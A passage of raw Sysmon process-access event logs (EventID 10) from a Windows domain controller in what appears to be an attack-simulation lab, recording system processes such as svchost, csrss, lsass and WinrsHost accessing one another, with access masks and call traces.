C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2691,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2692,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-001046CB0400}\r\nTargetProcessId: 4832\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-001046CB0400}","TargetProcessId":"4832","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\SYSTEM32\\CSRSRV.dll+1a30|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5c09|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2693,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.380\r\nSourceProcessGUID: {E2A3D6B1-1090-5F25-0000-001046CB0400}\r\nSourceProcessId: 4832\r\nSourceThreadId: 4852\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.380","SourceProcessGUID":"{E2A3D6B1-1090-5F25-0000-001046CB0400}","SourceProcessId":"4832","SourceThreadId":"4852","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2694,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.396\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.396","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2695,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.396\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nSourceProcessId: 1336\r\nSourceThreadId: 1444\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1090-5F25-0000-0010C6CA0400}\r\nTargetProcessId: 4820\r\nTargetImage: C:\\Windows\\system32\\WinrsHost.exe\r\nGrantedAccess: 0x40\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.396","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","SourceProcessId":"1336","SourceThreadId":"1444","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1090-5F25-0000-0010C6CA0400}","TargetProcessId":"4820","TargetImage":"C:\\Windows\\system32\\WinrsHost.exe","GrantedAccess":"0x40","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\winrscmd.dll+8d36|C:\\Windows\\system32\\winrscmd.dll+92d5|C:\\Windows\\system32\\winrscmd.dll+af31|C:\\Windows\\system32\\winrscmd.dll+23dc|c:\\windows\\system32\\wsmsvc.dll+155ac7|c:\\windows\\system32\\wsmsvc.dll+13f76d|c:\\windows\\system32\\wsmsvc.dll+13f3cf|c:\\windows\\system32\\wsmsvc.dll+13fcb2|c:\\windows\\system32\\wsmsvc.dll+9ab10|c:\\windows\\system32\\wsmsvc.dll+9b611|c:\\windows\\system32\\wsmsvc.dll+4495|c:\\windows\\system32\\wsmsvc.dll+16816c|c:\\windows\\system32\\wsmsvc.dll+1689b8|c:\\windows\\system32\\wsmsvc.dll+16345b|c:\\windows\\system32\\wsmsvc.dll+163125|c:\\windows\\system32\\wsmsvc.dll+14ce9c|c:\\windows\\system32\\wsmsvc.dll+130049|c:\\windows\\system32\\wsmsvc.dll+13571a|c:\\windows\\system32\\wsmsvc.dll+12f47e|c:\\windows\\system32\\wsmsvc.dll+125587|c:\\windows\\system32\\wsmsvc.dll+11f562|c:\\windows\\system32\\wsmsvc.dll+124574","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2696,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.411\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.411","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2697,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.411\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:52.411","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:52","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:52","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2698,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:52.411\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 